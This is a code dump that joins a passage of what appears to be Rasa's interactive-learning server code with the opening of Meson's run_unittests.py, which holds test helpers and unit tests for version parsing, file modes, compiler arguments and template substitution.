_interpreter = NaturalLanguageInterpreter.create(endpoints.nlu or args.get("nlu"))
model_directory = args.get("out", tempfile.mkdtemp(suffix="_core_model"))
_agent = await train(
args.get("domain"),
args.get("stories"),
model_directory,
_interpreter,
endpoints,
args.get("config")[0],
None,
additional_arguments,
)
app.agent = _agent
async def wait_til_server_is_running(
endpoint, max_retries=30, sleep_between_retries=1
) -> bool:
"""Try to reach the server, retry a couple of times and sleep in between."""
while max_retries:
try:
r = await retrieve_status(endpoint)
logger.info(f"Reached core: {r}")
if not r.get("is_ready"):
# server did not finish loading the agent yet
# in this case, we need to wait till the model trained
# so we might be sleeping for a while...
await asyncio.sleep(sleep_between_retries)
continue
else:
# server is ready to go
return True
except ClientError:
max_retries -= 1
if max_retries:
await asyncio.sleep(sleep_between_retries)
return False
def run_interactive_learning(
file_importer: TrainingDataImporter,
skip_visualization: bool = False,
conversation_id: Text = uuid.uuid4().hex,
server_args: Dict[Text, Any] = None,
) -> None:
"""Start the interactive learning with the model of the agent."""
global SAVE_IN_E2E
server_args = server_args or {}
if server_args.get("nlu_data"):
PATHS["nlu"] = server_args["nlu_data"]
if server_args.get("stories"):
PATHS["stories"] = server_args["stories"]
if server_args.get("domain"):
PATHS["domain"] = server_args["domain"]
SAVE_IN_E2E = server_args["e2e"]
if not skip_visualization:
p = Process(target=start_visualization, args=(DEFAULT_STORY_GRAPH_FILE,))
p.daemon = True
p.start()
else:
p = None
app = run.configure_app(enable_api=True)
endpoints = AvailableEndpoints.read_endpoints(server_args.get("endpoints"))
# before_server_start handlers make sure the agent is loaded before the
# interactive learning IO starts
app.register_listener(
partial(run.load_agent_on_start, server_args.get("model"), endpoints, None),
"before_server_start",
)
_serve_application(app, file_importer, skip_visualization, conversation_id)
if not skip_visualization and p is not None:
p.terminate() # pytype: disable=attribute-error
p.join() # pytype: disable=attribute-error
|
run_unittests.py
|
#!/usr/bin/env python3
# Copyright 2016-2017 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import typing as T
import stat
import subprocess
import re
import json
import tempfile
import textwrap
import os
import shutil
import sys
import unittest
import platform
import pickle
import functools
import io
import operator
import threading
import urllib.error
import urllib.request
import zipfile
import hashlib
from itertools import chain
from unittest import mock
from configparser import ConfigParser
from contextlib import contextmanager
from glob import glob
from pathlib import (PurePath, Path)
from distutils.dir_util import copy_tree
import typing as T
import mesonbuild.mlog
import mesonbuild.depfile
import mesonbuild.dependencies.base
import mesonbuild.compilers
import mesonbuild.envconfig
import mesonbuild.environment
import mesonbuild.mesonlib
import mesonbuild.coredata
import mesonbuild.modules.gnome
from mesonbuild.interpreter import Interpreter, ObjectHolder
from mesonbuild.ast import AstInterpreter
from mesonbuild.mesonlib import (
BuildDirLock, LibType, MachineChoice, PerMachine, Version, is_windows,
is_osx, is_cygwin, is_dragonflybsd, is_openbsd, is_haiku, is_sunos,
windows_proof_rmtree, python_command, version_compare, split_args,
quote_arg, relpath, is_linux
)
from mesonbuild.environment import detect_ninja
from mesonbuild.mesonlib import MesonException, EnvironmentException
from mesonbuild.dependencies import PkgConfigDependency, ExternalProgram
import mesonbuild.dependencies.base
from mesonbuild.build import Target, ConfigurationData
import mesonbuild.modules.pkgconfig
from mesonbuild.mtest import TAPParser, TestResult
from run_tests import (
Backend, FakeBuild, FakeCompilerOptions,
ensure_backend_detects_changes, exe_suffix, get_backend_commands,
get_builddir_target_args, get_fake_env, get_fake_options, get_meson_script,
run_configure_inprocess, run_mtest_inprocess
)
URLOPEN_TIMEOUT = 5
@contextmanager
def chdir(path: str):
curdir = os.getcwd()
os.chdir(path)
yield
os.chdir(curdir)
def get_dynamic_section_entry(fname, entry):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF platforms')
try:
raw_out = subprocess.check_output(['readelf', '-d', fname],
universal_newlines=True)
except FileNotFoundError:
# FIXME: Try using depfixer.py:Elf() as a fallback
raise unittest.SkipTest('readelf not found')
pattern = re.compile(entry + r': \[(.*?)\]')
for line in raw_out.split('\n'):
m = pattern.search(line)
if m is not None:
return m.group(1)
return None # The file did not contain the specified entry.
def get_soname(fname):
return get_dynamic_section_entry(fname, 'soname')
def get_rpath(fname):
return get_dynamic_section_entry(fname, r'(?:rpath|runpath)')
def is_tarball():
if not os.path.isdir('docs'):
return True
return False
def is_ci():
if 'CI' in os.environ:
return True
return False
def is_pull():
# Travis
if os.environ.get('TRAVIS_PULL_REQUEST', 'false') != 'false':
return True
# Azure
if 'SYSTEM_PULLREQUEST_ISFORK' in os.environ:
return True
return False
def _git_init(project_dir):
subprocess.check_call(['git', 'init'], cwd=project_dir, stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'config',
'user.name', 'Author Person'], cwd=project_dir)
subprocess.check_call(['git', 'config',
'user.email', 'teh_coderz@example.com'], cwd=project_dir)
subprocess.check_call('git add *', cwd=project_dir, shell=True,
stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'commit', '-a', '-m', 'I am a project'], cwd=project_dir,
stdout=subprocess.DEVNULL)
@functools.lru_cache()
def is_real_gnu_compiler(path):
'''
Check if the gcc we have is a real gcc and not a macOS wrapper around clang
'''
if not path:
return False
out = subprocess.check_output([path, '--version'], universal_newlines=True, stderr=subprocess.STDOUT)
return 'Free Software Foundation' in out
def skipIfNoExecutable(exename):
'''
Skip this test if the given executable is not found.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if shutil.which(exename) is None:
raise unittest.SkipTest(exename + ' not found')
return func(*args, **kwargs)
return wrapped
return wrapper
def skipIfNoPkgconfig(f):
'''
Skip this test if no pkg-config is found, unless we're on CI.
This allows users to run our test suite without having
pkg-config installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
Note: Yes, we provide pkg-config even while running Windows CI
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
return f(*args, **kwargs)
return wrapped
def skipIfNoPkgconfigDep(depname):
'''
Skip this test if the given pkg-config dep is not found, unless we're on CI.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
if not is_ci() and subprocess.call(['pkg-config', '--exists', depname]) != 0:
raise unittest.SkipTest('pkg-config dependency {} not found.'.format(depname))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_no_cmake(f):
'''
Skip this test if no cmake is found, unless we're on CI.
This allows users to run our test suite without having
cmake installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('cmake') is None:
raise unittest.SkipTest('cmake not found')
return f(*args, **kwargs)
return wrapped
def skip_if_not_language(lang):
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
try:
env = get_fake_env()
f = getattr(env, 'detect_{}_compiler'.format(lang))
f(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('No {} compiler found.'.format(lang))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_env_set(key):
'''
Skip a test if a particular env is set, except when running under CI
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
old = None
if key in os.environ:
if not is_ci():
raise unittest.SkipTest('Env var {!r} set, skipping'.format(key))
old = os.environ.pop(key)
try:
return func(*args, **kwargs)
finally:
if old is not None:
os.environ[key] = old
return wrapped
return wrapper
def skip_if_not_base_option(feature):
"""Skip tests if The compiler does not support a given base option.
for example, ICC doesn't currently support b_sanitize.
"""
def actual(f):
@functools.wraps(f)
def wrapped(*args, **kwargs):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if feature not in cc.base_options:
raise unittest.SkipTest(
'{} not available with {}'.format(feature, cc.id))
return f(*args, **kwargs)
return wrapped
return actual
@contextmanager
def temp_filename():
'''A context manager which provides a filename to an empty temporary file.
On exit the file will be deleted.
'''
fd, filename = tempfile.mkstemp()
os.close(fd)
try:
yield filename
finally:
try:
os.remove(filename)
except OSError:
pass
@contextmanager
def no_pkgconfig():
'''
A context manager that overrides shutil.which and ExternalProgram to force
them to return None for pkg-config to simulate it not existing.
'''
old_which = shutil.which
old_search = ExternalProgram._search
def new_search(self, name, search_dir):
if name == 'pkg-config':
return [None]
return old_search(self, name, search_dir)
def new_which(cmd, *kwargs):
if cmd == 'pkg-config':
return None
return old_which(cmd, *kwargs)
shutil.which = new_which
ExternalProgram._search = new_search
try:
yield
finally:
shutil.which = old_which
ExternalProgram._search = old_search
class InternalTests(unittest.TestCase):
def test_version_number(self):
searchfunc = mesonbuild.environment.search_version
self.assertEqual(searchfunc('foobar 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.128'), '2016.10.128')
self.assertEqual(searchfunc('2016.10.128'), '2016.10.128')
self.assertEqual(searchfunc('2016.10'), '2016.10')
self.assertEqual(searchfunc('2016.10 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('oops v1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.oops 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.x'), 'unknown version')
def test_mode_symbolic_to_bits(self):
modefunc = mesonbuild.mesonlib.FileMode.perms_s_to_bits
self.assertEqual(modefunc('---------'), 0)
self.assertEqual(modefunc('r--------'), stat.S_IRUSR)
self.assertEqual(modefunc('---r-----'), stat.S_IRGRP)
self.assertEqual(modefunc('------r--'), stat.S_IROTH)
self.assertEqual(modefunc('-w-------'), stat.S_IWUSR)
self.assertEqual(modefunc('----w----'), stat.S_IWGRP)
self.assertEqual(modefunc('-------w-'), stat.S_IWOTH)
self.assertEqual(modefunc('--x------'), stat.S_IXUSR)
self.assertEqual(modefunc('-----x---'), stat.S_IXGRP)
self.assertEqual(modefunc('--------x'), stat.S_IXOTH)
self.assertEqual(modefunc('--S------'), stat.S_ISUID)
self.assertEqual(modefunc('-----S---'), stat.S_ISGID)
self.assertEqual(modefunc('--------T'), stat.S_ISVTX)
self.assertEqual(modefunc('--s------'), stat.S_ISUID | stat.S_IXUSR)
self.assertEqual(modefunc('-----s---'), stat.S_ISGID | stat.S_IXGRP)
self.assertEqual(modefunc('--------t'), stat.S_ISVTX | stat.S_IXOTH)
self.assertEqual(modefunc('rwx------'), stat.S_IRWXU)
self.assertEqual(modefunc('---rwx---'), stat.S_IRWXG)
self.assertEqual(modefunc('------rwx'), stat.S_IRWXO)
# We could keep listing combinations exhaustively but that seems
# tedious and pointless. Just test a few more.
self.assertEqual(modefunc('rwxr-xr-x'),
stat.S_IRWXU |
stat.S_IRGRP | stat.S_IXGRP |
stat.S_IROTH | stat.S_IXOTH)
self.assertEqual(modefunc('rw-r--r--'),
stat.S_IRUSR | stat.S_IWUSR |
stat.S_IRGRP |
stat.S_IROTH)
self.assertEqual(modefunc('rwsr-x---'),
stat.S_IRWXU | stat.S_ISUID |
stat.S_IRGRP | stat.S_IXGRP)
def test_compiler_args_class_none_flush(self):
cc = mesonbuild.compilers.CCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock())
a = cc.compiler_args(['-I.'])
#first we are checking if the tree construction deduplicates the correct -I argument
a += ['-I..']
a += ['-I./tests/']
a += ['-I./tests2/']
#think this here as assertion, we cannot apply it, otherwise the CompilerArgs would already flush the changes:
# assertEqual(a, ['-I.', '-I./tests2/', '-I./tests/', '-I..', '-I.'])
a += ['-I.']
a += ['-I.', '-I./tests/']
self.assertEqual(a, ['-I.', '-I./tests/', '-I./tests2/', '-I..'])
#then we are checking that when CompilerArgs already have a build container list, that the deduplication is taking the correct one
a += ['-I.', '-I./tests2/']
self.assertEqual(a, ['-I.', '-I./tests2/', '-I./tests/', '-I..'])
def test_compiler_args_class(self):
cc = mesonbuild.compilers.CCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock())
# Test that empty initialization works
a = cc.compiler_args()
self.assertEqual(a, [])
# Test that list initialization works
a = cc.compiler_args(['-I.', '-I..'])
self.assertEqual(a, ['-I.', '-I..'])
# Test that there is no de-dup on initialization
self.assertEqual(cc.compiler_args(['-I.', '-I.']), ['-I.', '-I.'])
## Test that appending works
a.append('-I..')
self.assertEqual(a, ['-I..', '-I.'])
a.append('-O3')
self.assertEqual(a, ['-I..', '-I.', '-O3'])
## Test that in-place addition works
a += ['-O2', '-O2']
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2', '-O2'])
# Test that removal works
a.remove('-O2')
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2'])
# Test that de-dup happens on addition
a += ['-Ifoo', '-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# .extend() is just +=, so we don't test it
## Test that addition works
# Test that adding a list with just one old arg works and yields the same array
a = a + ['-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# Test that adding a list with one arg new and one old works
a = a + ['-Ifoo', '-Ibaz']
self.assertEqual(a, ['-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2'])
# Test that adding args that must be prepended and appended works
a = a + ['-Ibar', '-Wall']
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
## Test that reflected addition works
# Test that adding to a list with just one old arg works and yields the same array
a = ['-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
# Test that adding to a list with just one new arg that is not pre-pended works
a = ['-Werror'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with two new args preserves the order
a = ['-Ldir', '-Lbah'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with old args does nothing
a = ['-Ibar', '-Ibaz', '-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
## Test that adding libraries works
l = cc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Adding a library and a libpath appends both correctly
l += ['-Lbardir', '-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
# Adding the same library again does nothing
l += ['-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
## Test that 'direct' append and extend works
l = cc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
def test_compiler_args_class_gnuld(self):
## Test --start/end-group
linker = mesonbuild.linkers.GnuDynamicLinker([], MachineChoice.HOST, 'fake', '-Wl,', [])
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = gcc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-Wl,--end-group'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '-Wl,--end-group'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding a non-library argument doesn't include it in the group
l += ['-Lfoo', '-Wl,--export-dynamic']
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group', '-Wl,--export-dynamic'])
# -Wl,-lfoo is detected as a library and gets added to the group
l.append('-Wl,-ldl')
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--export-dynamic', '-Wl,-ldl', '-Wl,--end-group'])
def test_compiler_args_remove_system(self):
## Test --start/end-group
linker = mesonbuild.linkers.GnuDynamicLinker([], MachineChoice.HOST, 'fake', '-Wl,', [])
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = gcc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
## Test that to_native removes all system includes
l += ['-isystem/usr/include', '-isystem=/usr/share/include', '-DSOMETHING_IMPORTANT=1', '-isystem', '/usr/local/include']
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group', '-DSOMETHING_IMPORTANT=1'])
def test_string_templates_substitution(self):
dictfunc = mesonbuild.mesonlib.get_filenames_templates_dict
substfunc = mesonbuild.mesonlib.substitute_values
ME = mesonbuild.mesonlib.MesonException
# Identity
self.assertEqual(dictfunc([], []), {})
# One input, no outputs
inputs = ['bar/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + [d['@PLAINNAME@'] + '.ok'] + cmd[2:])
cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
# One input, one output
inputs = ['bar/foo.c.in']
outputs = ['out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': '.'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@.out', '@OUTPUT@', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + outputs + cmd[2:])
cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', '@OUTPUT0@']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out', d['@PLAINNAME@'] + '.ok'] + outputs)
cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
# One input, one output with a subdir
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Two inputs, no outputs
inputs = ['bar/foo.c.in', 'baz/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1]}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[1:])
cmd = ['@INPUT0@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@INPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
cmd = ['@INPUT0@', '@INPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Too many inputs
cmd = ['@PLAINNAME@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@BASENAME@']
self.assertRaises(ME, substfunc, cmd, d)
# No outputs
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTPUT0@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTDIR@']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, one output
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out'] + cmd[1:])
cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, two outputs
outputs = ['dir/out.c', 'dir/out2.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTPUT1@': outputs[1],
'@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT0@', '@OUTPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[2:])
cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', '@OUTDIR@']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok', 'dir'])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Many outputs, can't use @OUTPUT@ like this
cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
def test_needs_exe_wrapper_override(self):
config = ConfigParser()
config['binaries'] = {
'c': '\'/usr/bin/gcc\'',
}
config['host_machine'] = {
'system': '\'linux\'',
'cpu_family': '\'arm\'',
'cpu': '\'armv7\'',
'endian': '\'little\'',
}
# Can not be used as context manager because we need to
# open it a second time and this is not possible on
# Windows.
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.flush()
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
detected_value = env.need_exe_wrapper()
os.unlink(configfilename)
desired_value = not detected_value
config['properties'] = {
'needs_exe_wrapper': 'true' if desired_value else 'false'
}
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
forced_value = env.need_exe_wrapper()
os.unlink(configfilename)
self.assertEqual(forced_value, desired_value)
def test_listify(self):
listify = mesonbuild.mesonlib.listify
# Test sanity
self.assertEqual([1], listify(1))
self.assertEqual([], listify([]))
self.assertEqual([1], listify([1]))
# Test flattening
self.assertEqual([1, 2, 3], listify([1, [2, 3]]))
self.assertEqual([1, 2, 3], listify([1, [2, [3]]]))
self.assertEqual([1, [2, [3]]], listify([1, [2, [3]]], flatten=False))
# Test flattening and unholdering
holder1 = ObjectHolder(1)
self.assertEqual([holder1], listify(holder1))
self.assertEqual([holder1], listify([holder1]))
self.assertEqual([holder1, 2], listify([holder1, 2]))
self.assertEqual([holder1, 2, 3], listify([holder1, 2, [3]]))
def test_unholder(self):
unholder = mesonbuild.mesonlib.unholder
holder1 = ObjectHolder(1)
holder3 = ObjectHolder(3)
holders = [holder1, holder3]
self.assertEqual(1, unholder(holder1))
self.assertEqual([1], unholder([holder1]))
self.assertEqual([1, 3], unholder(holders))
def test_extract_as_list(self):
extract = mesonbuild.mesonlib.extract_as_list
# Test sanity
kwargs = {'sources': [1, 2, 3]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
self.assertEqual(kwargs, {'sources': [1, 2, 3]})
self.assertEqual([1, 2, 3], extract(kwargs, 'sources', pop=True))
self.assertEqual(kwargs, {})
# Test unholding
holder3 = ObjectHolder(3)
kwargs = {'sources': [1, 2, holder3]}
self.assertEqual(kwargs, {'sources': [1, 2, holder3]})
# flatten nested lists
kwargs = {'sources': [1, [2, [3]]]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
def test_pkgconfig_module(self):
dummystate = mock.Mock()
dummystate.subproject = 'dummy'
_mock = mock.Mock(spec=mesonbuild.dependencies.ExternalDependency)
_mock.pcdep = mock.Mock()
_mock.pcdep.name = "some_name"
_mock.version_reqs = []
_mock = mock.Mock(held_object=_mock)
# pkgconfig dependency as lib
deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
deps.add_pub_libs([_mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
# pkgconfig dependency as requires
deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
deps.add_pub_reqs([_mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
def _test_all_naming(self, cc, env, patterns, platform):
shr = patterns[platform]['shared']
stc = patterns[platform]['static']
shrstc = shr + tuple([x for x in stc if x not in shr])
stcshr = stc + tuple([x for x in shr if x not in stc])
p = cc.get_library_naming(env, LibType.SHARED)
self.assertEqual(p, shr)
p = cc.get_library_naming(env, LibType.STATIC)
self.assertEqual(p, stc)
p = cc.get_library_naming(env, LibType.PREFER_STATIC)
self.assertEqual(p, stcshr)
p = cc.get_library_naming(env, LibType.PREFER_SHARED)
self.assertEqual(p, shrstc)
